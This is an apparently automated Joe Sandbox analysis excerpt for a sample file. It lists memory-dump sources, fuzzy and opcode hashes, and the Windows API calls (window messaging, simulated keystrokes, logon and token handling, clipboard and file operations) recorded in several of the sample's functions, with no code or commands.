                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3429851547-4164748364
                                                      • Opcode ID: 02ee99fd7c0d6eae15ef6cd4438e6c82d3b9591c9ff77cc438c41b5c9c6b3415
                                                      • Instruction ID: 31988d05ca101e71924b532a5c91de9a0e6f4c24afc4a6b7104dd51e51e0d9a6
                                                      • Opcode Fuzzy Hash: 02ee99fd7c0d6eae15ef6cd4438e6c82d3b9591c9ff77cc438c41b5c9c6b3415
                                                      • Instruction Fuzzy Hash: DA429C31608245AFD724CF25CC84EEABBE6FF49320F144619F699872A1D7B1E850EF91
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00FB48F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00FB4908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00FB4927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00FB494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00FB495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00FB497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00FB49AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00FB49D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00FB4A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FB4A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FB4A7E
                                                      • IsMenu.USER32(?), ref: 00FB4A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FB4AF2
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FB4B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB4B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00FB4BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00FB4C82
                                                      • wsprintfW.USER32 ref: 00FB4CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB4CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FB4CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FB4D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB4D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FB4D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      • Opcode ID: 3ee3ba6e58a38575562207777c7100609a58ee2794055de06561d4f94e40128e
                                                      • Instruction ID: 81553b5f944e119916037cc0beedd155864f12d4332b2ffa350691c0502f2079
                                                      • Opcode Fuzzy Hash: 3ee3ba6e58a38575562207777c7100609a58ee2794055de06561d4f94e40128e
                                                      • Instruction Fuzzy Hash: B312D071900218ABEB248F26CD49FEE7BB8EF49720F104229F515DB2D2DB74A941EF50
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F3F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F7F474
                                                      • IsIconic.USER32(00000000), ref: 00F7F47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 00F7F48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F7F4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F7F4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F7F4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F7F4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F7F4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F7F4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F4E1
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F501
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F519
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F528
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F7F557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 4a3ff44c89f0c1e7578c9cc4c2cd41170d407bc3fc3fb0598c3ac8d6a771a8ea
                                                      • Instruction ID: 58623df970fbcecaf896ecc2c28c7efa4c994b0e738ac140c2f3be4f460c8058
                                                      • Opcode Fuzzy Hash: 4a3ff44c89f0c1e7578c9cc4c2cd41170d407bc3fc3fb0598c3ac8d6a771a8ea
                                                      • Instruction Fuzzy Hash: FD317271E4021CBBEB206BB59C8AFBF7E6DEB44B50F144166FA04E61D1C6B15D00BEA1
                                                      APIs
                                                        • Part of subcall function 00F816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                        • Part of subcall function 00F816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                        • Part of subcall function 00F816C3: GetLastError.KERNEL32 ref: 00F8174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F81286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F812A8
                                                      • CloseHandle.KERNEL32(?), ref: 00F812B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F812D1
                                                      • GetProcessWindowStation.USER32 ref: 00F812EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00F812F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F81310
                                                        • Part of subcall function 00F810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F811FC), ref: 00F810D4
                                                        • Part of subcall function 00F810BF: CloseHandle.KERNEL32(?,?,00F811FC), ref: 00F810E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0
                                                      • API String ID: 22674027-1027155976
                                                      • Opcode ID: c8d6dba5b6b639823925162e646e9337120706810ae4b7328f85414409891bae
                                                      • Instruction ID: e0c8e387ab0e21d9dd2353350f493b4444b332a03f96f5cd12202d0f3e4b52c2
                                                      • Opcode Fuzzy Hash: c8d6dba5b6b639823925162e646e9337120706810ae4b7328f85414409891bae
                                                      • Instruction Fuzzy Hash: 53818871900209ABDF20EFA4DC89FEE7BBDFF05714F144229F911A62A0D7348956EB60
                                                      APIs
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                        • Part of subcall function 00F810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                        • Part of subcall function 00F810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                        • Part of subcall function 00F810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F80BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F80C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00F80C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F80C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F80C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F80C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F80CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 00F80CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F80CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F80D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F80D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D45
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D55
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D65
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F80D78
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D7F
                                                        • Part of subcall function 00F81193: GetProcessHeap.KERNEL32(00000008,00F80BB1,?,00000000,?,00F80BB1,?), ref: 00F811A1
                                                        • Part of subcall function 00F81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F80BB1,?), ref: 00F811A8
                                                        • Part of subcall function 00F81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F80BB1,?), ref: 00F811B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: d3b11ea4488710c9ecf65decebdbec14602038e8f0fb6d195ef6971badd997ad
                                                      • Instruction ID: b8f5dba1e8e3b3991f8722c723f8ee529657037755593c99b7289a6c9d34d7cd
                                                      • Opcode Fuzzy Hash: d3b11ea4488710c9ecf65decebdbec14602038e8f0fb6d195ef6971badd997ad
                                                      • Instruction Fuzzy Hash: 39716A7290020AAFDF50AFA5DC84FEEBBB8BF05350F444615E914E7191DB71A909EFA0
                                                      APIs
                                                      • OpenClipboard.USER32(00FBCC08), ref: 00F9EB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F9EB37
                                                      • GetClipboardData.USER32(0000000D), ref: 00F9EB43
                                                      • CloseClipboard.USER32 ref: 00F9EB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EB87
                                                      • CloseClipboard.USER32 ref: 00F9EB91
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F9EBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00F9EBC9
                                                      • GetClipboardData.USER32(00000001), ref: 00F9EBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EBE2
                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00F9EC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F9EC38
                                                      • GetClipboardData.USER32(0000000F), ref: 00F9EC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F9EC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F9EC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F9ECD2
                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00F9ECF3
                                                      • CountClipboardFormats.USER32 ref: 00F9ED14
                                                      • CloseClipboard.USER32 ref: 00F9ED59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: d47ad27b5c6df44265713ca629e7020ca3b6911baa8e6ef986cb5a627ce207bb
                                                      • Instruction ID: 451046997a26711ddc3481746fc1a0080a3c0207aab125a9c9352b3a816cf5fd
                                                      • Opcode Fuzzy Hash: d47ad27b5c6df44265713ca629e7020ca3b6911baa8e6ef986cb5a627ce207bb
                                                      • Instruction Fuzzy Hash: 8161D035204206AFE700EF24DC85F6AB7A4EF84714F14461DF456972A2DB71DD05EBA2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F969BE
                                                      • FindClose.KERNEL32(00000000), ref: 00F96A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F96A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F96A75
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F96AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F96ADF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: ca08bd8a5f112f68d6ad314c2139d92f3c4ef025ebaf953e4d8e91171a5d94c6
                                                      • Instruction ID: 1d5a64d43bd3bcdfce7e608ff5e462b4efb59a110c06478ccf430b832192a08d
                                                      • Opcode Fuzzy Hash: ca08bd8a5f112f68d6ad314c2139d92f3c4ef025ebaf953e4d8e91171a5d94c6
                                                      • Instruction Fuzzy Hash: 4ED16172908314AEC710EB60DD91EAFB7ECAF88704F44491DF585C7191EB78DA08DBA2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F99663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00F996A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00F996BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F996D3
                                                      • FindClose.KERNEL32(00000000), ref: 00F996DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F996FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F9974A
                                                      • SetCurrentDirectoryW.KERNEL32(00FE6B7C), ref: 00F99768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F99772
                                                      • FindClose.KERNEL32(00000000), ref: 00F9977F
                                                      • FindClose.KERNEL32(00000000), ref: 00F9978F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 075f08cb47178dd4558ba113435e765d842d1390a260f8dedcad3a93d5f0d15e
                                                      • Instruction ID: fd135d91897213130085760bca146cc847d565911c56adb19efdcd75c5152084
                                                      • Opcode Fuzzy Hash: 075f08cb47178dd4558ba113435e765d842d1390a260f8dedcad3a93d5f0d15e
                                                      • Instruction Fuzzy Hash: 3731E33290520D6BEF14AFF9DC48ADF37AC9F49320F15425AF914E20A0DBB4DA40AE61
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F997BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F99819
                                                      • FindClose.KERNEL32(00000000), ref: 00F99824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F99840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F99890
                                                      • SetCurrentDirectoryW.KERNEL32(00FE6B7C), ref: 00F998AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F998B8
                                                      • FindClose.KERNEL32(00000000), ref: 00F998C5
                                                      • FindClose.KERNEL32(00000000), ref: 00F998D5
                                                        • Part of subcall function 00F8DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F8DB00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 0c5353e6e4c12b9ed0801b3e84f4fcc422bf3d6dd72f6f39709c4ccbb8d7d15b
                                                      • Instruction ID: 299f15e3189ba1eb6bdedc5031c95a3ae95d2c7c0e6c902da7d6091750c4e4b6
                                                      • Opcode Fuzzy Hash: 0c5353e6e4c12b9ed0801b3e84f4fcc422bf3d6dd72f6f39709c4ccbb8d7d15b
                                                      • Instruction Fuzzy Hash: E931F63190421D6BEF20EFB9DC48ADE37AC9F46330F55415DE810E20A1DBB0DA44EE60
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00F98257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F98267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F98273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F98310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F9838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 2c2b78109ff5184d99116959ddc557495a628097f56cd06c2455eccf3cf04404
                                                      • Instruction ID: c997c5b4d5cea325e3127b66c11a5399fd00c5e10eb70ef93fca5b1509eee1de
                                                      • Opcode Fuzzy Hash: 2c2b78109ff5184d99116959ddc557495a628097f56cd06c2455eccf3cf04404
                                                      • Instruction Fuzzy Hash: 6F6179725083059FDB10EF60D8819AEB3E8FF89360F04492EF989C7251DB35E946DB92
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F8D122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F8D1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8D1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F8D20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8D237
                                                        • Part of subcall function 00F8D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F8D21C,?,?), ref: 00F8D2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00F8D253
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 02c5531ac3f5cb9bcdff61619eafa22352162e04a001d960cdbe1127b8254e97
                                                      • Instruction ID: 951172c9645c1f0708716d49738efc139912929b33bd5d8ca48b70270e89e15b
                                                      • Opcode Fuzzy Hash: 02c5531ac3f5cb9bcdff61619eafa22352162e04a001d960cdbe1127b8254e97
                                                      • Instruction Fuzzy Hash: 50615A31C0511DABCF05FBA0EE929EDB7B9AF15300F644165E402B7191EB38AF09EB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
